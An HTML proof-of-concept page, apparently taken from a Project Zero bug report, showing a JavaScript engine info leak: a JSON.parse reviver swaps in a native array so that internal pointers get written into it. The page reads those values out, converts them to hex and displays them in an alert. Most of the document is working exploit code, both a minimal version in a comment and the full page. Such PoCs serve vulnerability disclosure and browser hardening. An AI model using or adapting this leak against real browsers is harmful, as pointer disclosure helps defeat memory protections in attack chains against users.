<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=952
There is an info leak in JSON.parse. If this function is called with a reviver, and the reviver modifies the output object to contain a native array, the Walk function assumes that this array is a Var array, and writes pointers to it. These pointers can then be read out of the array by script.
A minimal PoC is as follows:
var once = false;
var a = 1;
function f(){
if(!once){
a = new Array(1, 2, 3);
this[2] = a;
}
once = true;
return {};
}
JSON.parse("[1, 2, [4, 5]]", f);
A full PoC is attached. When loaded in a browser, this PoC will delay pointers in an alert dialog.
-->
<html>
<body>
<script>
var once = false;
var a = 1;
function f(){
if(!once){
a = new Array(1, 2, 3);
this[2] = a;
}
once = true;
//alert("f " + this);
return {};
}
JSON.parse("[1, 2, [4, 5]]", f);
var n = new Number(a[0]);
n = n >> 1;
var s = n.toString(16);
n = new Number(a[1]);
n = n >> 1;
s = s + n.toString(16);
n.length = 100;
n = new Number(a[2]);
n = n >> 1;
s = s + " " + n.toString(16);
n = new Number(a[3]);
n = n >> 1;
s = s + n.toString(16);
alert(s);
</script>
</body>
</html>
